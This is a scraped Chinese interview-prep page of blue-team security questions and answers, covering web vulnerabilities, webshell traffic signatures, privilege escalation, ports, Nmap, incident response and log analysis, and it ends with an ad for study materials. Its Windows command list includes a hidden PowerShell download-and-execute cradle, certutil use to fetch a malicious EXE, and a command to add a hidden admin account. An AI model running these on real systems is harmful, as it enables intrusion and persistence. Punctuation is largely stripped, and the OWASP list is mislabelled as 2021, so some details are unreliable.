2026/4/18 2:19:06
网站建设
项目流程
电子商务网站建设中的重要性,哈尔滨网页制作最新招聘信息,申请建设活动中心网站,中山建站HW重保蓝队Top 30类高频面试题清单
SQL 注入正向代理和反向代理的区别蚁剑 / 菜刀 / 冰蝎异同Windows 提权类型与方法Linux 提权XSSCSRF 攻击Docker 及相关应用Burp 模块OWASP TOP10数据库及类型常见的中间件漏洞IISApacheNginxTomcatWeblogic内网渗透思路正向 SHELL 和反向 S…HW重保蓝队Top 30类高频面试题清单SQL 注入正向代理和反向代理的区别蚁剑 / 菜刀 / 冰蝎异同Windows 提权类型与方法Linux 提权XSSCSRF 攻击Docker 及相关应用Burp 模块OWASP TOP10数据库及类型常见的中间件漏洞IISApacheNginxTomcatWeblogic内网渗透思路正向 SHELL 和反向 SHELL 的区别应急响应流程Windows 基础命令Linux 防火墙及应急处理Vulhub常见端口三次握手与四次挥手Nmap 工具使用Wireshark 简单的过滤规则常见取证分析工具日志分析蓝队初级 1SQL 注入列举几个攻击手法Mysql getshell漏洞挖掘有实践过吗Log4j 原理payload 特征Spring Boot RCEPHP 命令执行函数端口号Mysql,RDP,MSSQL永恒之蓝linux 提权 pkexecShell 工具流量特征如何判断对方服务器类型正向 shell 反向 shell常见的中间件及漏洞蓝队初级 2请你自我介绍一下你了解 sql 注入吗讲一些你知道的 sql 的利用spring rce 了解吗讲一下原理接触过安全设备吗讲一下你用过的 shell 管理工具以及他们的流量特征讲一下如果安全设备报警如何判断不是误报蓝队高级面试官面的蓝队初级java 序列化 讲下原理过程sql 注入 时间盲注csrf 与 ssrf 区别怎么防御 csrfwindows 中查看进程linux 查看用户名密码命令ua 中的信息存储型 xss 与 dom 型 xssdns 不出网咋办如何判断一个网站的真实 ip 地址python 解析 url 编码用什么库py4 什么的安全设备免杀 Webshellsqlmap 使用xxe发现 webshell 怎么操作内网redis 未授权访问SQL 注入SQLi 攻击与防御正向代理和反向代理的区别正向代理正向代理类似跳板通过正向代理机器访问外部互联网如果正向代理机器在海外可以连接 GFW 外部互联网客户端正向代理机器互联网正向代理可以收集用户上网信息进行权限认证等反向代理反向代理类似镜像实现对服务的转发实际上对外相当于一台服务器客户端反向代理机器目标机器反向代理能有效分隔内网机器防止攻击或者进行负载均衡蚁剑 / 菜刀 / 冰蝎异同相同都是用来连接 Web Shell 的工具 不同冰蝎有流量动态加密菜刀菜刀 webshell 只使用了 url 编码 base64 编码 shell 特征就是传输参数名为 z0还存在 int_set (“display_erros”,”0″) 字符串特征蚁剑默认的蚁剑 shell连接时会请求两次其请求体只是经过 url 编码其流量中也存在和蚁剑一样的代码 第一次请求关闭报错和 magic_quotes接下来去获取主机的信息 第二次请求会把主机目录列出来冰蝎 2.0使用 aes 加密发起三次请求 第一次请求服务端产生密钥写入 sessionsession 和当前会话绑定不同的客户端的密钥也是不同的 第二次请求是为了获取 key第三次使用 key 的 aes 加密进行通信冰蝎 3.0使用 aes 加密发起两次请求 3.0 分析流量发现相比 2.0 少了动态密钥的获取的请求不再使用随机生成 key改为取连接密码的 md5 加密值的前 16 位作为密钥 一次请求为判断是否可以建立连接少了俩次 get 获取冰蝎动态密钥的行为第二次发送 phpinfo 等代码执行获取网站的信息哥斯拉支持 n 种加密 采用了和冰蝎 3.0 一样的密钥交换方式哥斯拉建立连接时会发起三次请求第一次请求数据超级长建立 session第二三次请求确认连接Windows 提权类型与方法类型纵向提权低权限角色获得高权限角色的权限 横向提权获取同级别角色的权方法系统内核溢出漏洞提权数据库提权错误的系统配置提权组策略首选项提权WEB 中间件漏洞提权DLL 劫持提权滥用高危权限令牌提权第三方软件 / 服务提权等Linux 提权Linux 内核漏洞提权SUID 提权普通用户执行指令的标记find / -perm -us -type f 2/dev/null查找 SUID 为 root 的指令环境变量劫持高权限程序sudoer用户组配置文件错误提权pkexec 本地权限提升漏洞 (CVE-2021-4034)XSS反射型非持久化反射型 XSS 只是简单地把用户输入的数据 “反射” 给浏览器。也就是说黑客往往需要诱使用户点击一个恶意链接才能攻击成功存储型持久化用户提交的数据会被存储在后端不管是数据库、内存还是文件系统等当攻击者提交的包含有 XSS 攻击的代码被存储在后端中其他用户访问该页面的时候后端会将数据取出来显示在页面上这时候用户就会受到 XSS 攻击Dom-based 型客户端的脚本程序可以动态地检查和修改页面内容而不依赖于服务器端的数据。例如客户端如从 URL 中提取数据并在本地执行如果用户在客户端输入的数据包含了恶意的 JavaScript 脚本而这些脚本没有经过适当的过滤和消毒那么应用程序就可能受到 DOM-based XSS 攻击。需要特别注意以下的用户输入源 document.URL、location.hash、location.search、document.referrer 等。XSS 的防御对输入过滤将半角符号替换为全角符号利用白名单对输入进行过滤比如输入 id 只能输入数字对输出编码对容易引起 xss 的符号例如引号,进行 HTML 编码设置 HttpOnly让 js 脚本无法获取 cookies 内容CSRF 攻击CSRF 是跨站请求伪造攻击 一般来说攻击者通过伪造用户的浏览器的请求向访问一个用户自己曾经认证访问过的网站发送出去使目标网站接收并误以为是用户的真实操作而去执行命令。常用于盗取账号、转账、发送虚假消息等。攻击者利用网站对请求的验证漏洞而实现这样的攻击行为网站能够确认请求来源于用户的浏览器却不能验证请求是否源于用户的真实意愿下的操作行为。file其中 Web A 为存在 CSRF 漏洞的网站Web B 为攻击者构建的恶意网站User C 为 Web A 网站的合法用户。CSRF 攻击原理用户 C 打开浏览器访问受信任网站 A输入用户名和密码请求登录网站 A在用户信息通过验证后网站 A 产生 Cookie 信息并返回给浏览器此时用户登录网站 A 成功可以正常发送请求到网站 A用户未退出网站 A 之前在同一浏览器中打开一个 TAB 页访问网站 B网站 B 接收到用户请求后返回一些攻击性代码并发出一个请求要求访问第三方站点 A浏览器在接收到这些攻击性代码后根据网站 B 的请求在用户不知情的情况下携带 Cookie 信息向网站 A 发出请求。网站 A 并不知道该请求其实是由 B 发起的所以会根据用户 C 的 Cookie 信息以 C 的权限处理该请求导致来自网站 B 的恶意代码被执行。攻击范例假设某银行网站 A 以 GET 请求来发起转账操作转账的地址为www.xxx.com/transfer.do?accountNuml000lmoney10000参数 accountNum 表示转账的账户参数 money 表示转账金额。 而某大型论坛 B 上一个恶意用户上传了一张图片而图片的地址栏中填的并不是图片的地址而是前而所说的砖账地址当你登录网站 A 后没有及时登出这时你访问了论坛 B不幸的事情发生了你会发现你的账号里面少了 10000 块… 为什么会这样呢在你登录银行 A 时你的浏览器端会生成银行 A 的 cookie而当你访问论坛 B 的时候页面上的标签需要浏览器发起一个新的 HTTP 请求以获得图片资源当浏览器发起请求时请求的却是银行 A 的转账地址www.xxx.com/transfer.do?accountNuml000lmoney10000并且会带上银行 A 的 cookie 信息结果银行的服务器收到这个请求后会以为是你发起的一次转账操作因此你的账号里边便少了 10000 块。 当然绝大多数网站都不会使用 GET 请求来进行数据更新因此攻击者也需要改变思路与时俱进。 假设银行将其转账方式改成 POST 提交而论坛 B 恰好又存在一个 XSS 漏洞恶意用户在它的页面上植入如下代码var form document.forms(auto); form.submit();如果你此时恰好登录了银行 A且没有登出当你打开上述页面后脚本会将表单 aaa 提交把 accountNum 和 money 参数传递给银行的转账地址http://www.xxx.com/transfer.do同样的银行以为是你发起的一次转账会从你的账户中扣除 10000 块常见利用document.forms[0].submit();CSRF 防御尽量使用 POST设置 HttpOnly增加 Token自定义 http 请求头Docker 及相关应用详见 Docker 分类那 Docker 究竟有哪些好处呢除去之前说的环境的配置基于 Linux 的 cgroup 运行现在大部分开源 OJ 所使用的代码执行方式直接运行在宿主机不用类似 KVM 一样的模拟容器不是虚拟机有轻量级隔离也可以实现容器与宿主机的资源共享网络不是隔离的不需要硬件的支持不需要模拟硬件虚拟机需要 CPU 虚拟化支持进程级的模拟更快的启动速度以及更少的资源占用提供弹性的云服务Docker 容器可以随开随关很适合动态扩容。通过多个容器一台机器可以跑多个服务因此在本机就可以模拟出微服务架构Docker 及微服务可参考报告开发及生产环境配置Burp 模块Dashboard (仪表盘)Target (目标)Proxy (代理)Intruder (侵入) 也就是爆破Repeater (重放)Sequencer (序列器)Decoder (解码器)Comparer (比较)Extender (扩展)Project options (项目选项)Options (用户选项)OWASP TOP10OWASP 是开放式 Web 安全项目组织 2021 安全漏洞 Top10SQL 注入失效的身份认证和会话管理跨站脚本攻击 XSS直接引用不安全的对象安全配置错误敏感信息泄露缺少功能级的访问控制跨站请求伪造 CSRF使用含有已知漏洞的组件未验证的重定向和转发数据库及类型关系型MySQL3306SQL Server1433Oracle1521DB25000MongoDB27017 基于关系型与非关系型之间支持复杂查询语句数据结构非常松散非关系型Redis6379Memcached11211常见的中间件漏洞IISApacheNginx 是目前应用最广的三大 Web 服务器IISIIS 是 Internet Information Services 的缩写意为互联网信息服务是由微软公司提供的基于运行 Microsoft Windows 的互联网基本服务IIS 6 解析漏洞基于文件名该版本默认会将 *.asp;.jpg 此种格式的文件名当成 Asp 解析原理是服务器默认不解析号及其后面的内容相当于截断。IIS 6 解析漏洞防护限制上传目录执行权限不允许执行脚本。不允许新建目录。上传的文件需经过重命名时间戳 随机数 .jpg 等ApacheAddHandler 导致的解析漏洞如果运维人员给.php 后缀增加了处理器AddHandler application/x-httpd-php.php那么在有多个后缀的情况下只要一个文件名中含有.php 后缀即被识别成 PHP 文件没必要是最后一个后缀。防护同上 IIS 6Nginx配置文件错误导致的解析漏洞可以直接获取诸如index.php~,index.php.bak等文件对于任意文件名在后面添加 /xxx.phpxxx 为任意字符后即可将文件作为 php 解析。https://api.hz2016.com/a.png/a.php防护匹配对应文件rewrite 返回 404配置 cgi.fix_pathinfo (php.ini 中) 为 0 并重启 php-cgi 程序TomcatTomcat 任意文件写入CVE-2017-12615indowsTomcat 7.0.x 配置文件 readonlyfalse 导致我们可以往服务器写文件Weblogic任意文件上传漏洞CVE-2018-2894通过截获上传的时间戳找出真正的文件名达到 poc内网渗透思路代理穿透权限维持内网信息收集口令爆破凭据窃取社工横行和纵向渗透拿下域控正向 SHELL 和反向 SHELL 的区别正向 Shell攻击者连接被攻击者机器可用于攻击者处于内网被攻击者处于公网的情况。反向 Shell被攻击者主动连接攻击者可用于攻击者处于外网被攻击者处于内网的情况。应急响应流程准备阶段和客户确认事件背景、相关负责人联系方式、确定参与此次应急响应人员、根据客户描述初步判定事件响应策略携带应急响应工具包前往客户现场。检测阶段检测阶段确认入侵事件是否发生如真发生了入侵事件评估造成的危害比如说判断是信息泄露还是被写码了、范围以及发展的速度事件会不会进一步升级抑制阶段本阶段主要任务是通过事件分析查明事件危害的方式并且给出清除危害的解决方案 系统基本信息、网络排查、进程排查、注册表排查、计划任务排查、服务排查、关键目录排查、用户组排查、事件日志排查、webshell 排查、中间件日志排查、安全设备日志排查恢复阶段把受影响系统、设备、软件和应用服务还原到正常的工作状态 常见手段系统重装、补丁加固、网络恢复、密码重置、木马清除等。跟踪阶段调查事件原因输出应急响应报告提供安全建议、加强安全教育、避免同类事件应急相应一图流Windows 基础命令type 显示文本内容 type 1.txt dir 显示当前目录内容 dir/s/b 查询文件 返回绝对路径例如 dir/s/b d:\a.php 查询D盘中a.php文件返回绝对路径 dir c:\ /s /b *.txt 查询c盘中txt文件并返回绝对路径 /b 显示文件夹或文件的名字 /s 显示指定目录和所有子目录中的文件 * 是通配符可以代表任意字符串 del 删除文件 ipconfig 查看IP地址 ipconfig /all 查看所有ip配置信息 net user 查看用户 net user ad 查看用户权限 ad为用户名 net user username password /add username 和password为你要添加的账号和密码 net user username$ password /add 隐藏用户 net user username /del 删除 或者username$ 删除隐藏 net localgroup administrators username /add username为要添加管理员组别的用户 net localgroup administrators 查看所有用户包括隐藏 query user || qwinsta 查看管理员是否在线 tasklist /svc | find Ter假如 TermService 的 PID 是 1592。查找远程桌面端口 netstat -ano | find 1592查看 TermService 使用的端口如示例中的 3389 powershell -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(http://192.168.0.1/powershell.txt)) powershell 隐藏执行下载脚本 certutil.exe -urlcache -split -f “文件下载地址” d:\test.exe 将文件下载到d盘命名为test.exe Certutil.exe是作为证书服务的一部分安装的命令行程序。 我们可以使用此工具在目标计算机上执行恶意EXE文件Linux 防火墙及应急处理service iptables status # 查看防火墙状态 service iptables start #开启防火墙 service iptables stop #关闭防火墙 service iptables restart #重启防火墙查看用户组cat /etc/passwd #可以查看所有用户的列表 w #可以查看当前活跃的用户列表 cat /etc/group #查看用户组 groups #查看当前登录用户的组内成员 groups #test 查看test用户所在的组以及组内成员 whoami #查看当前登录用户名查看进程其中 -A显示所有进程 a显示终端中包括其它用户的所有进程 x显示无控制终端的进程ps aux | less ps -A ps -e #任务查看非root运行的进程 ps -U root -u root -N #任务查看用户vivek运行的进程 ps -u vivek #top命令提供了运行中系统的动态实时视图。在命令提示行中输入top top #进程树 ps -ejH ps axjf #获得线程信息 ps -eLf ps axms #获得安全信息 ps -eo euser,ruser,suser,fuser,f,comm,label ps axZ ps -eMLinux 端口查看#lsof -i:端口号查看某个端口的占用情况 lsof -i:8000 #更多lsof lsof -i:8080查看8080端口占用 lsof abc.txt显示开启文件abc.txt的进程 lsof -c abc显示abc进程现在打开的文件 lsof -c -p 1234列出进程号为1234的进程所打开的文件 lsof -g gid显示归属gid的进程情况 lsof d /usr/local/显示目录下被进程开启的文件 lsof D /usr/local/同上但是会搜索目录下的目录时间较长 lsof -d 4显示使用fd为4的进程 lsof -i -U显示所有打开的端口和UNIX domain文件 #netstat -tunlp 用于显示 tcpudp 的端口和进程等相关情况。 netstat -tunlp | grep 端口号 netstat -ntlp #查看当前所有tcp端口 netstat -ntulp | grep 80 #查看所有80端口使用情况 netstat -ntulp | grep 3306 #查看所有3306端口使用情况VulhubVulhub 是一个基于 docker 和 docker-compose 的漏洞环境集合进入对应目录并执行一条语句即可启动一个全新的漏洞环境让漏洞复现变得更加简单让安全研究者更加专注于漏洞原理本身。 Vulhub 官网常见端口21 ftp ftp的端口号20、21的区别一个是数据端口一个是控制端口控制端口一般为21 69 TFTP (简单文件传输协议) 22 SSH 23 Telnet 80 web 80-89 web 443 https SSL心脏滴血 445 SMB ms17-010永恒之蓝 873 Rsync未授权 1433 MSSQL 1521 Oracle 这玩应记不住记不住 3306 MySQL 3389 远程桌面 5432 PostgreSQL 5900 vnc 目前常用的协议有VNC/SPICE/RDP三种 、小巧支持客户端和服务器端的直接拷贝粘贴缺点速度最慢 6379 redis未授权 7001,7002 WebLogic默认弱口令反序列 8080 tomcat/WDCP主机管理系统默认弱口令 8080,8089,9090 JBOSS Jboss通常占用的端口是10981099444444458080800980838093这几个 默认端口是8080 在windows系统中 1098、1099、4444、4445、8083端口在/jboss/server/default/conf/jboss-service.xml中 8080端口在/jboss/server/default/deploy/jboss-web.deployer/server.xml中 8093端口在/jboss/server/default/deploy/jms/uil2-service.xml中。 8000-9090 都是一些常见的web端口 27017,27018 Mongodb未授权访问 28017 mongodb统计页面 50070,50030 hadoop默认端口未授权访问 161 SNMP 389 LDAP 512,513,514 Rexec 1025,111 NFS 2082/2083 cpanel主机管理系统登陆 国外用较多 2222 DA虚拟主机管理系统登陆 国外用较多 2601,2604 zebra路由默认密码zebra 3128 squid代理默认端口如果没设置口令很可能就直接漫游内网了 3312/3311 kangle主机管理系统登陆 4440 rundeck 参考WooYun: 借用新浪某服务成功漫游新浪内网 5984 CouchDB http://xxx:5984/_utils/ 6082 varnish 参考WooYun: Varnish HTTP accelerator CLI 未授权访问易导致网站被直接篡改或者作为代理进入内网 7778 Kloxo主机控制面板登录 8083 Vestacp主机管理系统 国外用较多 8649 ganglia 8888 amh/LuManager 主机管理系统默认端口 9200,9300 elasticsearch 参考WooYun: 多玩某服务器ElasticSearch命令执行漏洞 10000 Virtualmin/Webmin 服务器虚拟主机管理系统 11211 memcache未授权访问 50000 SAP命令执行三次握手与四次挥手背景TCP 位于传输层作用是提供可靠的字节流服务为了准确无误地将数据送达目的地TCP 协议采纳三次握手四次挥手策略三次握手three-way handshakingTCP 三次握手其实就是 TCP 应用在发送数据前通过 TCP 协议跟通信对方协商好连接信息建立起 TCP 的连接关系第一次握手客户端发送 SYN 报文并进入 SYN_SENT 状态等待服务器的确认第二次握手服务器收到 SYN 报文需要给客户端发送 ACK 确认报文同时服务器也要向客户端发送一个 SYN 报文所以也就是向客户端发送 SYN ACK 报文此时服务器进入 SYN_RCVD 状态第三次握手客户端收到 SYN ACK 报文向服务器发送确认包客户端进入 ESTABLISHED 状态。待服务器收到客户端发送的 ACK 包也会进入 ESTABLISHED 状态完成三次握手四次挥手Four-Way-Wavehand当我们的应用程序不需要数据通信了就会发起断开 TCP 连接。建立一个连接需要三次握手而终止一个连接需要经过四次挥手第一次挥手客户端发送一个 FIN用来关闭客户端到服务端的数据传送客户端进入 FIN_WAIT_1 状态第二次挥手服务端收到 FIN 后发送一个 ACK 给客户端确认序号为收到序号 1与 SYN 相同一个 FIN 占用一个序号服务端进入 CLOSE_WAIT 状态第三次挥手服务端发送一个 FIN用来关闭服务端到 客户端的数据传送服务端进入 LAST_ACK 状态第四次挥手客户端收到 FIN 后客户端进入 TIME_WAIT 状态接着发送一个 ACK 给服务端确认序号为收到序号 1服务端进入 CLOSED 状态完成四次挥手Nmap 工具使用Nmap 是主机扫描工具他的图形化界面是 Zenmap分布式框架为 Dnamp。 Nmap 可以完成以下任务 主机探测、端口扫描、版本检测、系统检测 支持探测脚本的编写 Nmap 在实际中应用场合如下通过对设备或者防火墙的探测来审计它的安全性探测目标主机所开放的端口通过识别新的服务器审计网络的安全性探测网络上的主机#扫描基础指令 -sT TCP (全)连接扫描准确但留下大量日志记录 -sS TCP SYN (半)扫描速度较快不会留下日志 -sN null 扫描标志位全为 0不适用 Windows -sF FIN 扫描标志位 FIN1不适用 Windows -O 查看目标主机系统版本 -sV 探测服务版本 -A 全面扫描 #主机发现 -sL: List Scan 列表扫描仅将指定的目标的IP列举出来不进行主机发现。 -sn: Ping Scan 只进行主机发现不进行端口扫描。 -Pn: 将所有指定的主机视作开启的跳过主机发现的过程。 -PS/PA/PU/PY[portlist]: 使用TCPSYN/ACK或SCTP INIT/ECHO方式进行发现。 -PE/PP/PM: 使用ICMP echo, timestamp, and netmask 请求包发现主机。-PO[protocollist]: 使用IP协议包探测对方主机是否开启。 -n/-R: -n表示不进行DNS解析-R表示总是进行DNS解析。 --dns-servers : 指定DNS服务器。 --system-dns: 指定使用系统的DNS服务器 --traceroute: 追踪每个路由节点 版本侦测的 #版本侦测 -sV: 指定让Nmap进行版本侦测 --version-intensity : 指定版本侦测强度0-9默认为7。数值越高探测出的服务越准确但是运行时间会比较长。 --version-light: 指定使用轻量侦测方式 (intensity 2) --version-all: 尝试使用所有的probes进行侦测 (intensity 9)Wireshark 简单的过滤规则#源ip ip.src1.1.1.1 #目的ip ip.dst1.1.1.1 #过滤80端口 tcp.port80 #源端口 tcp.srcport80 #目的端 tcp.dstport80 #协议过滤直接输入协议名即可如 http 协议 http #http 模式过滤过滤 get/post 包 httprequest.mothodGET/POST常见取证分析工具wireshark流量包、xplico、volatility内存取证、fastlr collector、autopsy、dumolt、ftk lmager、foremost、scalpel、bulik_exetractor日志分析Web 服务日志一图流 操作系统日志一图流常见日志文件位置IISWindows Server 2003 iis6 日志路径:C:\Windows\System32\LogFilesWindows Server 2008 R2、2012、2016、2019 iis7 以上日志路径C:\inetpub\logs\LogFilesApacheApacheWindowsD:\xampp\apache\logs\access.logApacheLinux/var/log/apache/access.log/var/log/apache2/access.log/var/log/httpd/access.lognginx/usr/local/nginx/logs常见格式内容访问的主机 IP请求时间请求方法、请求的 URL、采用的协议HTTP 状态码日志分析技巧1、列出当天访问次数最多的IP命令 cut -d- -f 1 log_file|uniq -c | sort -rn | head -20 2、查看当天有多少个IP访问 awk {print $1} log_file|sort|uniq|wc -l 3、查看某一个页面被访问的次数 grep /index.php log_file | wc -l 4、查看每一个IP访问了多少个页面 awk {S[$1]} END {for (a in S) print a,S[a]} log_file 5、将每个IP访问的页面数进行从小到大排序 awk {S[$1]} END {for (a in S) print S[a],a} log_file | sort -n 6、查看某一个IP访问了哪些页面 grep ^111.111.111.111 log_file| awk {print $1,$7} 7、去掉搜索引擎统计当天的页面 awk {print $12,$1} log_file | grep ^\Mozilla | awk {print $2} |sort | uniq | wc -l 8、查看2018年6月21日14时这一个小时内有多少IP访问: awk {print $4,$1} log_file | grep 21/Jun/2018:14 | awk {print $2}| sort | uniq | wc -l 9、统计爬虫 grep -E Googlebot|Baiduspider /www/logs/access.2019-02-23.log | awk { print $1 } | sort | uniq 10、统计浏览器 cat /www/logs/access.2019-02-23.log | grep -v -E MSIE|Firefox|Chrome|Opera|Safari|Gecko|Maxthon | sort | uniq -c | sort -r -n | head -n 100 11、IP统计 grep 23/May/2019 /www/logs/access.2019-02-23.log | awk {print $1} | awk -F.{print $1.$2.$3.$4} | sort | uniq -c | sort -r -n | head -n 10 12、统计网段 cat /www/logs/access.2019-02-23.log | awk {print $1} | awk -F.{print $1.$2.$3.0} | sort | uniq -c | sort -r -n | head -n 200 13、统计域名 cat /www/logs/access.2019-02-23.log |awk {print $2}|sort|uniq -c|sort -rn|more 14、 统计URL cat /www/logs/access.2019-02-23.log |awk {print $7}|sort|uniq -c|sort -rn|more 15、URL访问量统计 cat /www/logs/access.2019-02-23.log | awk {print $7} | egrep \?| | sort | uniq -c | sort -rn | more学习资源如果你是也准备转行学习网络安全黑客或者正在学习这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你知识库由360智榜样学习中心独家打造出品旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力熟练掌握基础攻防到深度对抗。1、知识库价值深度 本知识库超越常规工具手册深入剖析攻击技术的底层原理与高级防御策略并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等提供了独到的技术视角和实战验证过的对抗方案。广度 面向企业安全建设的核心场景渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点是应对复杂攻防挑战的实用指南。实战性 知识库内容源于真实攻防对抗和大型演练实践通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。2、 部分核心内容展示360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。内容组织紧密结合攻防场景辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合是你学习过程中好帮手。1、网络安全意识2、Linux操作系统3、WEB架构基础与HTTP协议4、Web渗透测试5、渗透测试案例分享6、渗透测试实战技巧7、攻防对战实战8、CTF之MISC实战讲解3、适合学习的人群一、基础适配人群零基础转型者适合计算机零基础但愿意系统学习的人群资料覆盖从网络协议、操作系统到渗透测试的完整知识链开发/运维人员具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能实现职业方向拓展或者转行就业应届毕业生计算机相关专业学生可通过资料构建完整的网络安全知识体系缩短企业用人适应期二、能力提升适配1、技术爱好者适合对攻防技术有强烈兴趣希望掌握漏洞挖掘、渗透测试等实战技能的学习者2、安全从业者帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力3、合规需求者包含等保规范、安全策略制定等内容适合需要应对合规审计的企业人员因篇幅有限仅展示部分资料完整版的网络安全学习资料已经上传CSDN朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】